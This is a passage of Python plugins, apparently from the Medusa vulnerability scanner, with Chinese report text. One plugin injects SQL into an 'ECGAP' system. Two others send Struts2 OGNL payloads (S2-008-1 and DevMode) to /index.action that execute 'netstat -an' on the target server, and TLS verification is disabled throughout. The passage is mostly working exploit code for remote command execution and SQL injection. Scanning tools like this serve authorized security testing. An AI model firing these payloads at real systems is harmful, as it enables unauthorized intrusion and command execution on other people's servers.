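    # it asks the server to compute.
    suffix = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload + suffix
            # verify=False: TLS certificate verification is disabled.
            resp = requests.get(payload_url, headers=headers, proxies=proxies,
                                timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and "81dc9bdb52d04dc20036dbd8313ed055" in con:
                Medusa = "{}存在ECGAPSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                # url plus the scan output go to the details writer
                VulnerabilityDetails(_t.info, url, **kwargs).Write()
                # url is the per-target output file name; Medusa is the result
                WriteFile().result(str(url), str(Medusa))
        except Exception as e:  # per-payload boundary: record and move on
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)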
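def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the Struts2 S2-008-1 signature on ``/index.action``.

    The plugin's probe string is sent as the query of ``/index.action`` and
    the response body is classified by ``Result``; a finding is reported when
    the classification is one of ``Linux``, ``NoteOS`` or ``Windows``.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed to ``VulnerabilityDetails`` when a finding is
            written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are logged via ``ErrorLog``.

    Changes from the original: the no-op ``else: port = port`` branch was
    dropped; the probe string and report text are unchanged.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    payload = '''?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%29)'''
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        # verify=False: TLS certificate verification is disabled for the probe.
        resp = requests.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        resilt = Result(con)
        if resilt in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-008-1\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
                url, con, resilt)
            _t = VulnerabilityInfo(Medusa)
            # url plus the scan output go to the details writer
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # url is the per-target output file name; Medusa is the result text
            WriteFile().result(str(url), str(Medusa))
    except Exception:  # plugin boundary: log and swallow
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, _)  # log target URL and failing plugin name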
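def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the Struts2 DevMode signature on ``/index.action``.

    The plugin's probe string is sent as the query of ``/index.action`` and
    the response body is classified by ``Result``; a finding is reported when
    the classification is one of ``Linux``, ``NoteOS`` or ``Windows``.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed to ``VulnerabilityDetails`` when a finding is
            written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are logged via ``ErrorLog``.

    Changes from the original: the report template had two placeholders for
    three values, so the ``Result`` classification was silently dropped; the
    部署系统 field used by the S2-008-1 plugin is added so it is reported.
    The no-op ``else: port = port`` branch was dropped.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    payload = '''?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'''
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        # verify=False: TLS certificate verification is disabled for the probe.
        resp = requests.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        resilt = Result(con)
        if resilt in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-Devmode\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
                url, con, resilt)
            _t = VulnerabilityInfo(Medusa)
            # url plus the scan output go to the details writer
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # url is the per-target output file name; Medusa is the result text
            WriteFile().result(str(url), str(Medusa))
    except Exception:  # plugin boundary: log and swallow
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, _)  # log target URL and failing plugin name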